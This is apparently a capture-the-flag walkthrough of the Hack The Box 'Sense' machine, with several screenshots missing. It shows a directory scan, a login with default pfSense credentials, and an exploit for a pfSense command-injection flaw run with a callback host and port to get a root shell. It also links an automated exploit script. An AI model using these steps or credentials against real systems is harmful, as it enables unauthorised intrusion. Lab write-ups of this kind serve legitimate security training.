🪒Sense

https://app.hackthebox.com/machines/111

The first problem was running gobuster; I had the following error:

Error: error on running gobuster: unable to connect to https://10.129.220.62/: invalid certificate: x509: certificate has expired or is not yet valid: current time 2024-03-11T10:06:27Z is after 2023-04-06T19:21:35Z

The problem comes from an issue with the SSL certificate on the server. The certificate either has already expired or its validity period hasn't started yet, according to the system's clock.

So the command to fix this was:

gobuster dir -u https://10.129.220.62 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
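As an added example (not part of the original write-up), this Python snippet decodes the error line above to tell which side of the certificate's validity window the clock fell on, and by how much. The function name `classify_validity_error` is made up for illustration; the only sample input is the error line from this page.

```python
import re
from datetime import datetime, timezone

# Error line copied from the gobuster output above.
GOBUSTER_ERROR = (
    "Error: error on running gobuster: unable to connect to https://10.129.220.62/: "
    "invalid certificate: x509: certificate has expired or is not yet valid: "
    "current time 2024-03-11T10:06:27Z is after 2023-04-06T19:21:35Z"
)

# Go's crypto/x509 ends the message with "current time <now> is after <NotAfter>"
# for an expired certificate and "... is before <NotBefore>" for one whose
# validity period has not started yet.
DETAIL = re.compile(r"current time (?P<now>\S+) is (?P<rel>after|before) (?P<bound>\S+)")


def _parse(ts):
    # RFC 3339 timestamp as printed by Go; a trailing "Z" means UTC.
    return datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc)


def classify_validity_error(line):
    """Return which validity bound was violated and the margin, or None."""
    m = DETAIL.search(line)
    if m is None:
        return None  # not a validity-window error
    now, bound = _parse(m["now"]), _parse(m["bound"])
    if m["rel"] == "after":
        # Clock is past NotAfter: the certificate has expired.
        return {"state": "expired", "field": "NotAfter",
                "bound": bound, "delta": now - bound}
    # Clock is before NotBefore: certificate not valid yet, or local clock is behind.
    return {"state": "not_yet_valid", "field": "NotBefore",
            "bound": bound, "delta": bound - now}


if __name__ == "__main__":
    result = classify_validity_error(GOBUSTER_ERROR)
    print(f"{result['state']}: {result['field']} was {result['bound'].isoformat()}, "
          f"off by {result['delta'].days} days")
```

A small margin in either direction usually points at clock skew on the scanning host; a margin of many months, as here, means the certificate itself was never renewed.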

We found a system-users.txt directory after our scan ->

So after a quick Google search we can see that the pfSense default credentials are:

So via the login page at /index.html ->

rohit
pfsense

We're in a control panel:

We find this command injection potentially useful:

After a bit of enumeration, we can see how to abuse this CVE:

So let's go to this directory and capture a request in Burp:

Not sure if it's cheating (probably), but I found this script on GitHub to exploit this vuln: https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Sense/autopwn_sense.py


Now let's see another way, let's be more manual:

Copy the payload to your local machine:

searchsploit -m /path/to/exploit

Now we look at the args:

python 43560.py --rhost 10.129.220.62 --lhost 10.10.14.62 --lport 8888 --username rohit --password pfsense

Nice one, get the user flag and root flag all in one ->
